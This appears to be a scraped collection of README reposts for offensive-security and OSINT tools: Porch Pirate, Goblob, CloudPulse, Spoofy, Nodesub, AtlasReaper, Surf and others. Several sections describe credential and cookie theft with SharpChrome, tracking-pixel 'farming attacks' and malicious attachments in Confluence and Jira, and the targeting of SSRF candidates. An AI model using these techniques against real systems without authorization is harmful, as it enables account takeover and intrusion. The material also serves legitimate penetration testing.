    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
    request_data = p.request(r['id'])
    print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    OSINT-Framework - OSINT Framework

    By: Zion3R


    OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

    I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

    Please visit the framework at the link below and good hunting!


    https://osintframework.com

    Legend

    (T) - Indicates a link to a tool that must be installed and run locally
    (D) - Google Dork, for more information: Google Hacking
    (R) - Requires registration
    (M) - Indicates a URL that contains the search term and the URL itself must be edited manually

    For Update Notifications

    Follow me on Twitter: @jnordine - https://twitter.com/jnordine
    Watch or star the project on Github: https://github.com/lockfale/osint-framework

    Suggestions, Comments, Feedback

    Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter.

    Contribute with a GitHub Pull Request

    For new resources, please ensure that the site is available for public and free use.

    1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
  • Submit pull request!
  • Thank you!

    OSINT Framework Website

    https://osintframework.com

    Happy Hunting!



    Goblob - A Fast Enumeration Tool For Publicly Exposed Azure Storage Blobs

    By: Zion3R


    Goblob is a lightweight and fast enumeration tool designed to aid in the discovery of sensitive information exposed publicy in Azure blobs, which can be useful for various research purposes such as vulnerability assessments, penetration testing, and reconnaissance.

    Warning. Goblob will issue individual goroutines for each container name to check in each storage account, only limited by the maximum number of concurrent goroutines specified in the -goroutines flag. This implementation can exhaust bandwidth pretty quickly in most cases with the default wordlist, or potentially cost you a lot of money if you're using the tool in a cloud environment. Make sure you understand what you are doing before running the tool.


    Installation

    go install github.com/Macmod/goblob@latest

    Usage

    To use goblob simply run the following command:

    $ ./goblob <storageaccountname>

    Where <storageaccountname> is the target storage account to enumerate public Azure blob storage URLs on.

    You can also specify a list of storage account names to check:

    $ ./goblob -accounts accounts.txt

    By default, the tool will use a list of common Azure Blob Storage container names to construct potential URLs. However, you can also specify a custom list of container names using the -containers option. For example:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt

    The tool also supports outputting the results to a file using the -output option:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -output results.txt

    If you want to provide accounts to test via stdin you can also omit -accounts (or the account name) entirely:

    $ cat accounts.txt | ./goblob

    Wordlists

    Goblob comes bundled with basic wordlists that can be used with the -containers option:

    Optional Flags

    Goblob provides several flags that can be tuned in order to improve the enumeration process:

    • -goroutines=N - Maximum number of concurrent goroutines to allow (default: 5000).
    • -blobs=true - Report the URL of each blob instead of the URL of the containers (default: false).
    • -verbose=N - Set verbosity level (default: 1, min: 0, max: 3).
    • -maxpages=N - Maximum of container pages to traverse looking for blobs (default: 20, set to -1 to disable limit or to 0 to avoid listing blobs at all and just check if the container is public)
    • -timeout=N - Timeout for HTTP requests (seconds, default: 90)
    • -maxidleconns=N - MaxIdleConns transport parameter for HTTP client (default: 100)
    • -maxidleconnsperhost=N - MaxIdleConnsPerHost transport parameter for HTTP client (default: 10)
    • -maxconnsperhost=N - MaxConnsPerHost transport parameter for HTTP client (default: 0)
    • -skipssl=true - Skip SSL verification (default: false)
    • -invertsearch=true - Enumerate accounts for each container instead of containers for each account (default: false)

    For instance, if you just want to find publicly exposed containers using large lists of storage accounts and container names, you should use -maxpages=0 to prevent the goroutines from paginating the results. Then run it again on the set of results you found with -blobs=true and -maxpages=-1 to actually get the URLs of the blobs.

    If, on the other hand, you want to test a small list of very popular container names against a large set of storage accounts, you might want to try -invertsearch=true with -maxpages=0, in order to see the public accounts for each container name instead of the container names for each storage account.

    You may also want to try changing -goroutines, -timeout and -maxidleconns, -maxidleconnsperhost and -maxconnsperhost and -skipssl in order to best use your bandwidth and find results faster.

    Experiment with the flags to find what works best for you ;-)

    Example

    A fast enumeration tool for publicly exposed Azure Storage blobs. (6)

    Contributing

    Contributions are welcome by opening an issue or by submitting a pull request.

    TODO

    • Check blob domain for NXDOMAIN before trying wordlist to save bandwidth (maybe)
    • Improve default parameters for better performance

    Wordcloud

    An interesting visualization of popular container names found in my experiments with the tool:


    If you want to know more about my experiments and the subject in general, take a look at my article:



    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin ips

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

    4 - Now go to http://:8000/search and enjoy the search engine

    1- download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- update script.py and settings file to the host 'localhost':

    #script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
    #se/settings.py

    ELASTICSEARCH_DSL = {
    'default': {
    'hosts': 'localhost:9200'
    },
    }

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

    as an example searching for .mil data gives:

    searching for tesla as en example gives :

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    Mailchecker - Cross-language Temporary (Disposable/Throwaway) Email Detection Library. Covers 55 734+ Fake Email Providers

    By: Zion3R


    Cross-language email validation. Backed by a database of over 55 000 throwable email domains.

    This will be very helpful when you have to contact your users and you want to avoid errors causing lack of communication or want to block "spamboxes".


    Need to provide Webhooks inside your SaaS?

    Need to embed a charts into an email?

    It's over with Image-Charts, no more server-side rendering pain, 1 url = 1 chart.

    https://image-charts.com/chart?
    cht=lc // chart type
    &chd=s:cEAELFJHHHKUju9uuXUc // chart data
    &chxt=x,y // axis
    &chxl=0:|0|1|2|3|4|5| // axis labels
    &chs=873x200 // size

    Use Image-Charts for free


    Upgrade from 1.x to 3.x

    Mailchecker public API has been normalized, here are the changes:

    • NodeJS/JavaScript: MailChecker(email) -> MailChecker.isValid(email)
    • PHP: MailChecker($email) -> MailChecker::isValid($email)
    • Python
    import MailChecker
    m = MailChecker.MailChecker()
    if not m.is_valid('bla@example.com'):
    # ...

    became:

    import MailChecker
    if not MailChecker.is_valid('bla@example.com'):
    # ...

    MailChecker currently supports:


    Usage

    NodeJS

    var MailChecker = require('mailchecker');

    if(!MailChecker.isValid('myemail@yopmail.com')){
    console.error('O RLY !');
    process.exit(1);
    }

    if(!MailChecker.isValid('myemail.com')){
    console.error('O RLY !');
    process.exit(1);
    }

    JavaScript

    <script type="text/javascript" src="MailChecker/platform/javascript/MailChecker.js"></script>
    <script type="text/javascript">
    if(!MailChecker.isValid('myemail@yopmail.com')){
    console.error('O RLY !');
    }

    if(!MailChecker.isValid('myemail.com')){
    console.error('O RLY !');
    }
    </script>

    PHP

    include __DIR__."/MailChecker/platform/php/MailChecker.php";

    if(!MailChecker::isValid('myemail@yopmail.com')){
    die('O RLY !');
    }

    if(!MailChecker::isValid('myemail.com')){
    die('O RLY !');
    }

    Python

    pip install mailchecker
    # no package yet; just drop in MailChecker.py where you want to use it.
    from MailChecker import MailChecker

    if not MailChecker.is_valid('bla@example.com'):
    print "O RLY !"

    Django validator: https://github.com/jonashaag/django-indisposable

    Ruby

    require 'mail_checker'

    unless MailChecker.valid?('myemail@yopmail.com')
    fail('O RLY!')
    end

    Rust

     extern crate mailchecker;

    assert_eq!(true, mailchecker::is_valid("plop@plop.com"));
    assert_eq!(false, mailchecker::is_valid("\nok@gmail.com\n"));
    assert_eq!(false, mailchecker::is_valid("ok@guerrillamailblock.com"));

    Elixir

    Code.require_file("mail_checker.ex", "mailchecker/platform/elixir/")

    unless MailChecker.valid?("myemail@yopmail.com") do
    raise "O RLY !"
    end

    unless MailChecker.valid?("myemail.com") do
    raise "O RLY !"
    end

    Clojure

    ; no package yet; just drop in mailchecker.clj where you want to use it.
    (load-file "platform/clojure/mailchecker.clj")

    (if (not (mailchecker/valid? "myemail@yopmail.com"))
    (throw (Throwable. "O RLY!")))

    (if (not (mailchecker/valid? "myemail.com"))
    (throw (Throwable. "O RLY!")))

    Go

    package main

    import (
    "log"

    "github.com/FGRibreau/mailchecker/platform/go"
    )

    if !mail_checker.IsValid('myemail@yopmail.com') {
    log.Fatal('O RLY !');
    }

    if !mail_checker.IsValid('myemail.com') {
    log.Fatal("O RLY !")
    }

    Installation

    Go

    go get https://github.com/FGRibreau/mailchecker

    NodeJS/JavaScript

    npm install mailchecker

    Ruby

    gem install ruby-mailchecker

    PHP

    composer require fgribreau/mailchecker

    We accept pull-requests for other package manager.

    Data sources

    TorVPN

      $('td', 'table:last').map(function(){
    return this.innerText;
    }).toArray();

    BloggingWV

      Array.prototype.slice.call(document.querySelectorAll('.entry > ul > li a')).map(function(el){return el.innerText});

    ... please add your own dataset to list.txt.

    Regenerate libraries from list.txt

    Just run (requires NodeJS):

    npm run build

    Development

    Development environment requires docker.

    # install and setup every language dependencies in parallel through docker
    npm install

    # run every language setup in parallel through docker
    npm run setup

    # run every language tests in parallel through docker
    npm test

    Backers

    Maintainers

    These amazing people are maintaining this project:

    Contributors

    These amazing people have contributed code to this project:

    Discover how you can contribute by heading on over to the CONTRIBUTING.md file.

    Changelog



    PathFinder - Tool That Provides Information About A Website

    By: Zion3R


    Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β 


    • Retrieve important information about a website
    • Gain insights into the technologies used by a website
    • Identify subdomains and DNS information
    • Check firewall names and certificate details
    • Perform bypass operations for captcha and JavaScript content

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/PathFinder.git
    2. Install the required packages:

      pip install -r requirements.txt

    This will install all the required modules and their respective versions.

    Run the program using the following command:

    Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
    Ò””Ò”€# python3 web-info-explorer.py --help
    usage: wpathFinder.py [-h] url

    Web Information Program

    positional arguments:
    url Enter the site URL

    options:
    -h, --help show this help message and exit

    Replace <url> with the URL of the website you want to explore.

    Here is an example output of running the program:

    Ò”ŒÒ”€Ò”€(root💀denizhalil)-[~/MyProjects/]
    Ò””Ò”€# python3 pathFinder.py https://www.facebook.com/
    Site Information:
    Title: Facebook - Login or Register
    Last Updated Date: None
    First Creation Date: 1997-03-29 05:00:00
    Dns Information: []
    Sub Branches: ['157']
    Firewall Names: []
    Technologies Used: javascript, php, css, html, react
    Certificate Information:
    Certificate Issuer: US
    Certificate Start Date: 2023-02-07 00:00:00
    Certificate Expiration Date: 2023-05-08 23:59:59
    Certificate Validity Period (Days): 90
    Bypassed JavaScript content:
    </ div>

    Contributions are welcome! To contribute to PathFinder, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    • Thank you my friend Varol

    This project is licensed under the MIT License - see the LICENSE file for details.

    For any inquiries or further information, you can reach me through the following channels:



    Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

    By: Zion3R



    Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

    Well, Spoofy is different and here is why:

    1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
    2. Accurate bulk lookups
    3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
    4. SPF lookup counter

    Β 

    HOW TO USE

    Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

    Usage:
    ./spoofy.py -d [DOMAIN] -o [stdout or xls]
    OR
    ./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

    Install Dependencies:
    pip3 install -r requirements.txt

    HOW DO YOU KNOW ITS SPOOFABLE

    (The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

    METHODOLOGY

    The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

    After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

    DISCLAIMER

    This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

    CREDIT

    Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

    DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

    Logo: cobracode

    Tool was inspired by Bishop Fox's project called spoofcheck.



    DakshSCRA - Source Code Review Assist

    By: Zion3R


    Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

    Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

    What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


    Debut

    Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

    While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

    Features and Functionalities

    Distinctive Features (Multiple World’s First)

    • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

    • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

    • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

    • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

    Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

    Additionally, the tool offers the following functionalities:

    • Options to use platform-specific rules specific for finding areas of interests
    • Options to extend or add new rules for any new or existing languages
    • Generates report in text, HTML and PDF format for inspection

    Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

    Feel free to contribute towards updating or adding new rules and future development.

    If you find any bugs, report them to d3basis.m0hanty@gmail.com.

    Tool Setup

    Pre-requisites

    Python3 and all the libraries listed in requirements.txt

    Setting up environment to run this tool

    1. Setup a virtual environment

    $ pip install virtualenv

    $ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
    Example: virtualenv -p python3 venv

    $ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
    Example: source venv/bin/activate

    After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

    2. Ensure all required libraries are installed within the virtual environment

    You must run the below command after activating the virtual environment as mentioned in the previous steps.

    pip install -r requirements.txt

    Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

    Tool Usage

    $ python3 dakshscra.py -h // To view avaialble options and arguments

    usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

    options:
    -h, --help show this help message and exit
    -r RULE_FILE Specify platform specific rule name
    -f FILE_TYPES Specify file types to scan
    -v Specify verbosity level {'-v', '-vv', '-vvv'}
    -t TARGET_DIR Specify target directory path
    -l {R,RF}, --list {R,RF}
    List rules [R] OR rules and filetypes [RF]
    -recon Detects platform, framework and programming language used
    -estimate Estimate efforts required for code review

    Example Usage

    $ python3 dakshscra.py // To view tool usage along with examples

    Examples:
    # '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
    dakshsca.py -r php -t /source_dir_path

    # To override default settings, other filetypes can be specified with '-f' option.
    dakshsca.py -r php -f dotnet -t /path_to_source_dir
    dakshsca.py -r php -f custom -t /path_to_source_dir

    # Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
    dakshsca.py -recon -r php -t /path_to_source_dir

    # Perform only reconnaissance if '-recon' used without the '-r' option.
    dakshsca.py -recon -t /path_to_source_dir

    # Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
    dakshsca.py -r php -vv -t /path_to_source_dir


    Supported RULE_FILE: dotnet, java, php, javascript
    Supported FILE_TY PES: dotnet, php, java, custom, allfiles

    Reports

    The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

    Scanning (Areas of Security Concerns) Report

    HTML Report:
    • DakshSCRA/reports/html/report.html
    PDF Report:
    • DakshSCRA/reports/html/report.pdf
    RAW TEXT Based Reports:
    • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
    • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
    • Identified Project Files: DakshSCRA/runtime/filepaths.txt

    Reconnaissance (Recon) Report

    • Reconnaissance Summary: /reports/text/recon.txt

    Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

    Code Review Effort Estimation Report

    • Effort estimation report: /reports/html/estimation.html

    Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

    Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



    Nodesub - Command-Line Tool For Finding Subdomains In Bug Bounty Programs

    By: Zion3R


    Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.


    Features

    • Perform subdomain enumeration using CIDR notation (Support input list).
    • Perform subdomain enumeration using ASN (Support input list).
    • Perform subdomain enumeration using a list of domains.

    Installation

    To install Nodesub, use the following command:

    npm install -g nodesub

    NOTE:

    • Edit File ~/.config/nodesub/config.ini

    Usage

    nodesub -h

    This will display help for the tool. Here are all the switches it supports.

    Examples
    • Enumerate subdomains for a single domain:

       nodesub -u example.com
    • Enumerate subdomains for a list of domains from a file:

       nodesub -l domains.txt
    • Perform subdomain enumeration using CIDR:

      node nodesub.js -c 192.168.0.0/24 -o subdomains.txt

      node nodesub.js -c CIDR.txt -o subdomains.txt

    • Perform subdomain enumeration using ASN:

      node nodesub.js -a AS12345 -o subdomains.txt
      node nodesub.js -a ASN.txt -o subdomains.txt
    • Enable recursive subdomain enumeration and output the results to a JSON file:

       nodesub -u example.com -r -o output.json -f json

    Output

    The tool provides various output formats for the results, including:

    • Text (txt)
    • JSON (json)
    • CSV (csv)
    • PDF (pdf)

    The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.



    AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

    By: Zion3R

    Β 


    AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.


    Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                       .@@@@
    @@@@@
    @@@@@ @@@@@@@
    @@@@@ @@@@@@@@@@@
    @@@@@ @@@@@@@@@@@@@@@
    @@@@, @@@@ *@@@@
    @@@@ @@@ @@ @@@ .@@@
    _ _ _ ___ @@@@@@@ @@@@@@
    /_\| |_| |__ _ __| _ \___ __ _ _ __ ___ _ _ @@ @@@@@@@@
    / _ \ _| / _` (_-< / -_) _` | '_ \/ -_) '_| @@ @@@@@@@@
    /_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_| @@@@@@@@ &@
    |_| @@@@@@@@@@ @@&
    @@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@. @@
    @werdhaihai

    Usage

    AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

    .\AtlasReaper.exe [command] [subcommand] [options]

    Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

    Below is a list of available commands and subcommands:

    Commands

    Each command has sub commands for interacting with the specific product.

    • confluence
    • jira

    Subcommands

    Confluence

    • confluence attach - Attach a file to a page.
    • confluence download - Download an attachment.
    • confluence embed - Embed a 1x1 pixel image to perform farming attacks.
    • confluence link - Add a link to a page.
    • confluence listattachments - List attachments.
    • confluence listpages - List pages in Confluence.
    • confluence listspaces - List spaces in Confluence.
    • confluence search - Search Confluence.

    Jira

    • jira addcomment - Add a comment to an issue.
    • jira attach - Attach a file to an issue.
    • jira createissue - Create a new issue.
    • jira download - Download attachment(s) from an issue.
    • jira listattachments - List attachments on an issue.
    • jira listissues - List issues in Jira.
    • jira listprojects - List projects in Jira.
    • jira listusers - List Atlassian users.
    • jira searchissues - Search issues in Jira.

    Common Commands

    • help - Display more information on a specific command.

    Examples

    Here are a few examples of how to use AtlasReaper:

    • Search for a keyword in Confluence with wildcard search:

      .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

    • Attach a file to a page in Confluence:

      .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

    • Create a new issue in Jira:

      .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

    Authentication

    Confluence and Jira can be configured to allow anonymous access. You can check this by supplying omitting the -c/--cookie from the commands.

    In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

    1. .\SharpChrome.exe cookies /showall

    2. Look for any cookies scoped to the *.atlassian.net named cloud.session.token or tenant.session.token

    Limitations

    Please note the following limitations of AtlasReaper:

    • The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
    • AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
    • For write operations, the username associated with the user session token (or "anonymous") will be listed.

    Contributing

    If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.



    Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

    By: Zion3R


    surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending a HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

    You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

    Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.


    Installation

    This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

    It can be installed with the following command:

    go install github.com/assetnote/surf/cmd/surf@latest

    Usage

    Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

    # find all ssrf candidates (including external IP addresses via HTTP probing)
    surf -l bigcorp.txt
    # find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
    surf -l bigcorp.txt -t 10 -c 200
    # find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
    surf -l bigcorp.txt -d
    # find all hosts that point to an internal/private IP address (no HTTP probing)
    surf -l bigcorp.txt -x

    The full list of settings can be found below:

    ❯ surf -h

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
    β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

    by shubs @ assetnote

    Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

    Options:
    --hosts FILE, -l FILE
    List of assets (hosts or subdomains)
    --concurrency CONCURRENCY, -c CONCURRENCY
    Threads (passed down to httpx) - default 100 [default: 100]
    --timeout SECONDS, -t SECONDS
    Timeout in seconds (passed down to httpx) - default 3 [default: 3]
    --retries RETRIES, -r RETRIES
    Retries on failure (passed down to httpx) - default 2 [default: 2]
    --disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
    --disableanalysis, -d
    Disable analysis and only output list of hosts - default false [default: false]
    --help, -h display this help and exit

    Output

    When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is ran from:

    • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
    • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

    These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

    Acknowledgements

    Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

